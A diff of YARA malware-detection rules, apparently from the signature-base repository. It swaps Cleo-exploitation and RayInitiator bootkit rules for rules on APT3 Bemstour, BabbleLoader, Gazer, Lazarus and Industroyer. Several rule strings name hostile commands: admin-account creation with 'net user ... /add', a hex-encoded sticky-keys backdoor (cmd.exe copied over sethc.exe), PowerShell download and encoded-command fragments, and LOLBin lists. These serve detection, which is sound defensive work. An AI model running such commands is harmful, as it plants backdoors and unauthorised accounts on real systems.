-		$sb9 = "WinHttp.WinHttpRequest" ascii
-		$sb10 = ".DownloadFile(" ascii
-		$sb11 = ".DownloadString(" ascii
-		$sb12 = "Bypass" nocase ascii
-		$sb13 = "-EncodedCommand" ascii
-		$sb14 = "-windowstyle hidden" ascii
-		$sb15 = " -enc " ascii
+		$dbg_print_1 = "leaked address is 0x%llx" ascii wide
+		$dbg_print_2 = "========== %s ==========" ascii wide
+		$dbg_print_3 = "detailVersion:%d" ascii wide
+		$dbg_print_4 = "create pipe twice failed" ascii wide
+		$dbg_print_5 = "WSAStartup function failed with error: %d" ascii wide
+		$dbg_print_6 = "can't open input file." ascii wide
+		$dbg_print_7 = "Allocate Buffer Failed." ascii wide
+		$dbg_print_8 = "Connect to target failed." ascii wide
+		$dbg_print_9 = "connect successful." ascii wide
+		$dbg_print_10 = "not supported Platform" ascii wide
+		$dbg_print_11 = "Wait several seconds." ascii wide
+		$dbg_print_12 = "not set where to write ListEntry ." ascii wide
+		$dbg_print_13 = "backdoor not installed." ascii wide
+		$dbg_print_14 = "REConnect to target failed." ascii wide
+		$dbg_print_15 = "Construct TreeConnectAndX Request Failed." ascii wide
+		$dbg_print_16 = "Construct NTCreateAndXRequest  Failed." ascii wide
+		$dbg_print_17 = "Construct Trans2  Failed." ascii wide
+		$dbg_print_18 = "Construct ConsWXR  Failed." ascii wide
+		$dbg_print_19 = "Construct ConsTransSecondary  Failed." ascii wide
+		$dbg_print_20 = "if you don't want to input password , use server2003 version.." ascii wide
+		$cmdline_1 = "Command format  %s TargetIp domainname username password 2" ascii wide
+		$cmdline_2 = "Command format  %s TargetIp domainname username password 1" ascii wide
+		$cmdline_3 = "cmd.exe /c net user test test /add && cmd.exe /c net localgroup administrators test /add" ascii wide
+		$cmdline_4 = "hello.exe  \"C:\\WINDOWS\\DEBUG\\test.exe\"" ascii wide
+		$cmdline_5 = "parameter not right" ascii wide
+		$smb_param_1 = "browser" ascii wide
+		$smb_param_2 = "spoolss" ascii wide
+		$smb_param_3 = "srvsvc" ascii wide
+		$smb_param_4 = "\\PIPE\\LANMAN" ascii wide
+		$smb_param_5 = "Werttys for Workgroups 3.1a" ascii wide
+		$smb_param_6 = "PC NETWORK PROGRAM 1.0" ascii wide
+		$smb_param_7 = "LANMAN1.0" ascii wide
+		$smb_param_8 = "LM1.2X002" ascii wide
+		$smb_param_9 = "LANMAN2.1" ascii wide
+		$smb_param_10 = "NT LM 0.12" ascii wide
+		$smb_param_12 = "WORKGROUP" ascii wide
+		$smb_param_13 = "Windows Server 2003 3790 Service Pack 2" ascii wide
+		$smb_param_14 = "Windows Server 2003 5.2" ascii wide
+		$smb_param_15 = "Windows 2002 Service Pack 2 2600" ascii wide
+		$smb_param_16 = "Windows 2002 5.1" ascii wide
+		$smb_param_17 = "PC NETWORK PROGRAM 1.0" ascii wide
+		$smb_param_18 = "Windows 2002 5.1" ascii wide
+		$smb_param_19 = "Windows for Workgroups 3.1a" ascii wide
+		$unique_str_1 = "WIN-NGJ7GKNROVS"
+		$unique_str_2 = "XD-A31C2E0087B2"
 
 	condition:
-		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $dbg_print* ) or 2 of ( $cmdline* ) or 1 of ( $unique_str* ) ) and 3 of ( $smb_param* )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_2 : FILE
+rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Byte_Patch
 {
 	meta:
-		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "a71c71f3-d36f-5c27-b150-e678bccf2dba"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L148-L183"
+		description = "Detects an implant used by Bemstour exploitation tool (APT3)"
+		author = "Mark Lechtik"
+		id = "c30434c3-8949-566c-b6a6-29bffdaf961d"
+		date = "2019-06-25"
+		modified = "2023-12-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt3_bemstour.yar#L69-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "60e53c8d99fde8c48bff67408605aa69c3c1fe3040ba4f9d2080980df970aa93"
-		score = 70
+		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
+		logic_hash = "08de2c885ccb24cb247efdcc06bbcbea144d652744b2d38aaa2aabfd341e4f91"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		company = "Check Point Software Technologies LTD."
 
 	strings:
-		$sa1 = "<Action actiontype=\"Commands\"" ascii
-		$sa2 = "<?xml version=" ascii
-		$sa3 = "<Runninglocalrequired>" ascii
-		$sa4 = "<Autostartup>" ascii
-		$sb1 = "wscript" ascii
-		$sb2 = "cscript" ascii
-		$sb3 = "mshta" ascii
-		$sb4 = "certutil" ascii
-		$sb5 = "pwsh" ascii
-		$sb6 = "curl" ascii
-		$sb7 = "msiexec" ascii
-		$sb8 = "taskkill" ascii
-		$sb9 = "regsvr32" ascii
-		$sb10 = "rundll32" ascii
-		$sb11 = "bitsadmin" ascii
-		$sb12 = "whoami" ascii
-		$sb13 = "bcdedit" ascii
-		$sb14 = "systeminfo" ascii
-		$sb15 = "reg " ascii
-		$sb16 = "schtasks" ascii
+		$chunk_1 = {
+
+C7 45 ?? 55 8B EC 83
+C7 45 ?? EC 74 53 56
+C7 45 ?? 8B 75 08 33
+C7 45 ?? C9 57 C7 45
+C7 45 ?? 8C 4C 6F 61
+
+}
 
 	condition:
-		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
+		any of them
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_PS1_Indicators_Dec24 : SCRIPT
+rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Command_Stack_Variable
 {
 	meta:
-		description = "Detects encoded and decoded PowerShell loader used during Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "491cda57-0ad0-5ddc-90cb-48411eef2f2e"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L185-L202"
+		description = "Detecs an implant used by Bemstour exploitation tool (APT3)"
+		author = "Mark Lechtik"
+		id = "c773da5a-2d3f-5a0a-af2e-28ad382622b3"
+		date = "2019-06-25"
+		modified = "2023-12-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt3_bemstour.yar#L107-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87dcd0aa3c16d8948514b1d8589d38c6cc73bf7e6262f4517659cead16fedd3d"
+		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
+		logic_hash = "36710db313a52db2a0c0af356e701d3a36e5597203e87fd7f8586d202738be33"
 		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = ""
+		company = "Check Point Software Technologies LTD."
 
 	strings:
-		$xe1 = "Start-Process -WindowStyle Hidden -FilePath jre\\bin\\java.exe" base64 ascii wide
-		$xe2 = "$f=\"cleo." base64 ascii wide
-		$xe3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " base64 ascii wide
-		$x1 = "$f=\"cleo." ascii wide
-		$x2 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
+		$chunk_1 = {
+
+C7 85 ?? ?? ?? ?? 63 6D 64 2E
+C7 85 ?? ?? ?? ?? 65 78 65 20
+C7 85 ?? ?? ?? ?? 2F 63 20 63
+C7 85 ?? ?? ?? ?? 6F 70 79 20
+C7 85 ?? ?? ?? ?? 25 77 69 6E
+C7 85 ?? ?? ?? ?? 64 69 72 25
+C7 85 ?? ?? ?? ?? 5C 73 79 73
+C7 85 ?? ?? ?? ?? 74 65 6D 33
+C7 85 ?? ?? ?? ?? 32 5C 63 6D
+C7 85 ?? ?? ?? ?? 64 2E 65 78
+C7 85 ?? ?? ?? ?? 65 20 25 77
+C7 85 ?? ?? ?? ?? 69 6E 64 69
+C7 85 ?? ?? ?? ?? 72 25 5C 73
+C7 85 ?? ?? ?? ?? 79 73 74 65
+C7 85 ?? ?? ?? ?? 6D 33 32 5C
+C7 85 ?? ?? ?? ?? 73 65 74 68
+C7 85 ?? ?? ?? ?? 63 2E 65 78
+C7 85 ?? ?? ?? ?? 65 20 2F 79
+83 A5 ?? ?? ?? ?? 00
+}
+		$chunk_2 = {
+
+C7 85 ?? ?? ?? ?? 63 6D 64 20
+C7 85 ?? ?? ?? ?? 2F 63 20 22
+C7 85 ?? ?? ?? ?? 6E 65 74 20
+C7 85 ?? ?? ?? ?? 75 73 65 72
+C7 85 ?? ?? ?? ?? 20 63 65 73
+C7 85 ?? ?? ?? ?? 73 75 70 70
+C7 85 ?? ?? ?? ?? 6F 72 74 20
+C7 85 ?? ?? ?? ?? 31 71 61 7A
+C7 85 ?? ?? ?? ?? 23 45 44 43
+C7 85 ?? ?? ?? ?? 20 2F 61 64
+C7 85 ?? ?? ?? ?? 64 20 26 26
+C7 85 ?? ?? ?? ?? 20 6E 65 74
+C7 85 ?? ?? ?? ?? 20 6C 6F 63
+C7 85 ?? ?? ?? ?? 61 6C 67 72
+C7 85 ?? ?? ?? ?? 6F 75 70 20
+C7 85 ?? ?? ?? ?? 61 64 6D 69
+C7 85 ?? ?? ?? ?? 6E 69 73 74
+C7 85 ?? ?? ?? ?? 72 61 74 6F
+C7 85 ?? ?? ?? ?? 72 73 20 63
+C7 85 ?? ?? ?? ?? 65 73 73 75
+C7 85 ?? ?? ?? ?? 70 70 6F 72
+C7 85 ?? ?? ?? ?? 74 20 2F 61
+C7 85 ?? ?? ?? ?? 64 64 22 00
+6A 5C
 
-	condition:
-		1 of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_JAR_Indicators_Dec24 : FILE
-{
-	meta:
-		description = "Detects characteristics of JAR files used during Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "4e8f6aa8-9efd-5fcf-b795-5042d4ba1708"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L204-L222"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8b87e7000ab5d9759f55660a085bf0f3dddb46ad1ea411cbbabce1000105ee9e"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		$chunk_3 = {
 
-	strings:
-		$s1 = "TLS v3 " ascii
-		$s2 = "java/util/Base64$Decoder" ascii
-		$s3 = "AES/CBC/NoPadding" ascii
-		$s4 = "getenv" ascii
-		$s5 = "ava/util/zip/ZipInputStream" ascii
+C7 45 ?? 57 69 6E 45
+C7 45 ?? 78 65 63 00
+C7 45 ?? 47 65 74 50
+C7 45 ?? 72 6F 63 41
+C7 45 ?? 64 64 72 65
+C7 45 ?? 73 73 00 00
+C7 45 ?? 43 72 65 61
+C7 45 ?? 74 65 46 69
+C7 45 ?? 6C 65 41 00
+C7 45 ?? 57 72 69 74
+C7 45 ?? 65 46 69 6C
+C7 45 ?? 65 00 00 00
+C7 45 ?? 43 6C 6F 73
+C7 45 ?? 65 48 61 6E
+C7 45 ?? 64 6C 65 00
+89 4D ??
 
-	condition:
-		uint16( 0 ) == 0xfeca and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_1_1 : FILE
-{
-	meta:
-		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - files Cli, ScSlot, Slot, SrvSlot"
-		author = "Florian Roth"
-		id = "2940ddad-3dba-594a-9111-e4741d6ff39b"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L224-L245"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85600e9310e502b3b2135f2f3cf698ae54fe362047cdf9d378dcc107e0c2fa18"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "0c57b317b572d071afd8ccdb844dd6f117e20f818c6031d7ba8adcbd32be0617"
-
-	strings:
-		$a1 = "java/lang/StringBuffer"
-		$x1 = "Start-Sleep 3;del " ascii
-		$x2 = "sleep 3;rm -f '" ascii
-		$x3 = "powershell -Noninteractive -EncodedCommand " ascii
-		$x4 = "runDelFileCmd" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 50KB and $a1 and 1 of ( $x* )
+		any of them
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_2 : FILE
+rule SIGNATURE_BASE_Mal_Babbleloader_Win_Jan24 : FILE
 {
 	meta:
-		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - file Proc"
-		author = "Florian Roth"
-		id = "bd575454-7fd0-566d-94e5-ec1368675108"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L247-L265"
+		description = "This rule detects intrinsic patterns of BabbleLoader."
+		author = "0x0d4y"
+		id = "b2f18ab3-b4df-4e2f-aa23-de8694beb221"
+		date = "2025-01-27"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/babbleloader-technical-malware-analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_babbleloader_win_jan24.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2bb5eace09b832bf3ce296484f473c9c56f97b881ea17838408be6000cc6fcb1"
-		score = 75
+		hash = "fa3d03c319a7597712eeff1338dabf92"
+		logic_hash = "d4f7915146b1f3fe50febc231247e14323e9d68a94b2b9c8149a5727c06162ca"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		hash1 = "1ba95af21bac45db43ebf02f87ecedde802c7de4d472f33e74ee0a5b5015a726"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
 
 	strings:
-		$s1 = "Timeout getting pipe-data" ascii fullword
-		$s2 = "Ftprootpath" ascii fullword
-		$s3 = "Rest cmd=" ascii fullword
-		$s4 = "writeToProc" ascii fullword
+		$str_decryption_algorithm = { 48 63 44 24 ?? 48 8b 4c 24 ?? 0f b6 04 ?? 33 44 ?? ?? 0f b6 4c ?? ?? d2 c8 48 63 4c ?? ?? 48 8b 54 ?? ?? 88 04 0a 6b 44 24 ?? ?? 89 44 ?? ?? 8b 44 24 ?? ff c0 89 44 24 }
+		$hashing_algorithm = { 48 8b 44 24 ?? 0f be ?? 89 44 24 ?? 8b 44 24 ?? 89 44 24 ?? 48 8b 44 24 ?? 48 ff c0 48 89 44 24 ?? 83 7c 24 08 ?? ?? ?? 8b 44 24 ?? 8b 0c ?? 03 c8 8b c1 89 04 24 8b 44 24 ?? 05 ?? ?? ?? ?? 8b 0c 24 0f af c8 8b c1 89 04 }
+		$halos_gate = { 48 8b 44 24 ?? 0f b6 ?? 83 f8 4c 0f ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 ?? ?? 3d 8b ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d d1 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d b8 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85 c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 88 44 ?? ?? 48 8b 44 24 ?? 0f b6 40 ?? 88 44 ?? ?? 0f b6 44 ?? ?? c1 e0 08 0f b6 4c ?? ?? 0b c1 48 8b 8c ?? ?? ?? ?? ?? 89 01 ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 00 3d e9 }
+		$get_syscall_offset = { 4d 33 db 4c 8b d9 c3 }
+		$jump_syscall_offset = { 4c 8b d1 41 8b 03 41 ff 63 ?? }
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 30KB and 3 of them
+		uint16( 0 ) == 0x5a4d and $str_decryption_algorithm and $hashing_algorithm and ( 1 of ( $halos_gate , $get_syscall_offset , $jump_syscall_offset ) )
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_3 : FILE
+rule SIGNATURE_BASE_Gazer_Certificate_1 : FILE
 {
 	meta:
-		description = "Detects characteristics of JAR files used during Cleo software exploitation"
-		author = "X__Junior"
-		id = "5c227bb9-0731-5955-a758-6fe86ecc2d86"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L267-L286"
+		description = "Detects Tura's Gazer malware"
+		author = "ESET"
+		id = "4eace653-003e-5cae-9db8-f26502f35fc4"
+		date = "2017-08-30"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_gazer.yar#L27-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64a6194110d4eb359cc3f15137cf752d598f2f0a52ac181fcaa358bf40072f54"
+		logic_hash = "ef248ac5cdde0034d940f80b32966fe64841dcf99923dfc0a7035354af963f56"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "java/lang/String" ascii
-		$s1 = "#lsz#" ascii
-		$s2 = "#dbg#" ascii
-		$s3 = "#ll#" ascii
-		$s4 = "SvZipDataOverflow=%d OpNotConf=" ascii
+		$certif1 = { 52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02 }
+		$certif2 = { 12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c }
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 20KB and 3 of ( $s* ) and $a1
+		uint16( 0 ) == 0x5a4d and 1 of them and filesize < 2MB
 }
-rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_1
+rule SIGNATURE_BASE_Gazer_Logfile_Name_1 : FILE
 {
 	meta:
-		description = "Detects RayInitiator GRUB bootkit stage 1 code that searches for the 'Booting the kernel' string."
-		author = "NCSC"
-		id = "9805bc8c-ca98-54f1-92e0-d05a0bd68636"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L1-L19"
+		description = "Detects Tura's Gazer malware"
+		author = "ESET"
+		id = "c10d440f-dc9e-54c8-b329-9f22cba05e86"
+		date = "2017-08-30"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_gazer.yar#L41-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e657de97954545f06fc6997a3221eb77037fb89c6c56f08eeb78be615512a3e4"
-		score = 85
+		logic_hash = "c893ec41884f106329350c079b087e41a5b9f1040ab0892c90c03972d49dc070"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$xc1 = {
-         BB 00 00 40 00 43 81 FB 00 00 60 00 0F 87 AB 00 00 00
-         8B 3B 81 FF 64 6F 6E 65 75 E9 83 C3 04 8B 3B 81 FF 2E 0A 42 6F 75
-         DC 83 C3 04 8B 3B 81 FF 6F 74 69 6E 75 CF 83 C3 04 8B 3B 81 FF 67
-         20 74 68 75 C2 83 C3 04 8B 3B 81 FF 65 20 6B 65 75 B5 83 C3 04 8B
-         3B 81 FF 72 6E 65 6C 75 A8 83 EB 14
-      }
+		$s1 = "CVRG72B5.tmp.cvr"
+		$s2 = "CVRG1A6B.tmp.cvr"
+		$s3 = "CVRG38D9.tmp.cvr"
 
 	condition:
-		$xc1
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_2
+rule SIGNATURE_BASE_SUSP_VEST_Encryption_Core_Accumulator_Jan21 : FILE
 {
 	meta:
-		description = "Detects RayInitiator GRUB bootkit stage 2 code that identifies the Linux kernel syscall table."
-		author = "NCSC"
-		id = "30d32c60-7557-54d7-b995-53845d6e0d4c"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L21-L37"
+		description = "Detects VEST encryption core accumulator in PE file as used by Lazarus malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8343652b-8865-5213-b735-d6d4084e4a84"
+		date = "2021-01-28"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ochsenmeier/status/1354737155495649280"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jan21.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27f040bc14caec745f04fa32de08955a09857a801e5f2f04936fffca991c9d19"
-		score = 85
+		logic_hash = "41fe42b2f2b5fb54b7ff19b74a35aadd928be9a3c7280ee9feffc4a142924b07"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "7cd3ca8bdfb44e98a4b9d0c6ad77546e03d169bda9bdf3d1bcf339f68137af23"
 
 	strings:
-		$xc1 = {
-         49 89 E0 48 83 F8 30 0F 84 70 00 00 00 49 01 C0 49 8B
-         10 48 83 C0 08 66 85 D2 75 E4 BF ?? ?? 60 00 48 8B 3C 17 48 BE 6E
-         6D 69 5F 6D 61 78 5F
-      }
+		$sc1 = { 4F 70 46 DA E1 8D F6 41 59 E8 5D 26 1E CC 2F 89
+               26 6D 52 BA BC 11 6B A9 C6 47 E4 9C 1E B6 65 A2
+               B6 CD 90 47 1C DF F8 10 4B D2 7C C4 72 25 C6 97
+               25 5D C6 1D 4B 36 BC 38 36 33 F8 89 B4 4C 65 A7
+               96 CA 1B 63 C3 4B 6A 63 DC 85 4C 57 EE 2A 05 C7
+               0C E7 39 35 8A C1 BF 13 D9 52 51 3D 2E 41 F5 72
+               85 23 FE A1 AA 53 61 3B 25 5F 62 B4 36 EE 2A 51
+               AF 18 8E 9A C6 CF C4 07 4A 9B 25 9B 76 62 0E 3E
+               96 3A A7 64 23 6B B6 19 BC 2D 40 D7 36 3E E2 85
+               9A D1 22 9F BC 30 15 9F C2 5D F1 23 E6 3A 73 C0 }
 
 	condition:
-		$xc1
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_3
+rule SIGNATURE_BASE_Industroyer_Malware_1 : FILE
 {
 	meta:
-		description = "Detects RayInitiator GRUB bootkit stage 3 install phase code that searches for the 'client-cert-fail' string."
-		author = "NCSC"
-		id = "329e0713-5637-5e24-bd7b-9d7cf63e2f6b"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L39-L55"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f5ab571c-03a7-538a-ada1-0930d15af5cf"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L12-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "332756bc77cc17c3330ce1ffb0af9d1a7c0f5f9a457f7e9ad7f4081d7aba50c6"
-		score = 85
+		logic_hash = "276b7abdf43b62c3943a8dc362e1c68b23cc505d288e4395a6ac3cb4795371f2"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910"
+		hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81"
 
 	strings:
-		$xc1 = {
-         48 81 EE 00 00 00 08 48 B8 63 6C 69 65 6E 74 2D 63 49
-         B8 65 72 74 2D 66 61 69 6C 48 FF C6 48 39 D6 0F 87 D2
-         00 00 00 48 8B 3E 48 39 C7
-      }
+		$s1 = "haslo.exe" fullword ascii
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide
+		$s3 = "SYS_BASCON.COM" fullword wide
+		$s4 = "*.pcmt" fullword wide
+		$s5 = "*.pcmi" fullword wide
+		$x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73
+         00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61
+         00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43
+         00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45
+         00 3A 00 5C 00 00 00 }
+		$x2 = "haslo.dat\x00Crash"
 
 	condition:
-		$xc1
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_3_LINE_VIPER_Shellcode
+rule SIGNATURE_BASE_Industroyer_Malware_2 : FILE
 {
 	meta:
-		description = "Detects RayInitiator GRUB bootkit stage 3 deploy phase code that copies LINE VIPER shellcode stub and marks executable."
-		author = "NCSC"
-		id = "2b0cee4a-3c16-51f0-9c36-87364a34aa2f"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/RayInitiator-LINE-VIPER/ncsc-mar-rayinitiator-line-viper.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L57-L72"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0561a7bb-3b6c-5caf-9131-04924cee1e0f"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L39-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e509bde73d8843b188d632fa44bb4d90ff9d1766138c830c2932e503c5a07197"
-		score = 85
-		quality = 85
-		tags = ""
+		logic_hash = "cda3e21c130acd76785905364416b3e8803e866dd93529da57ec980e7af081b7"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
+		hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4"
+		hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77"
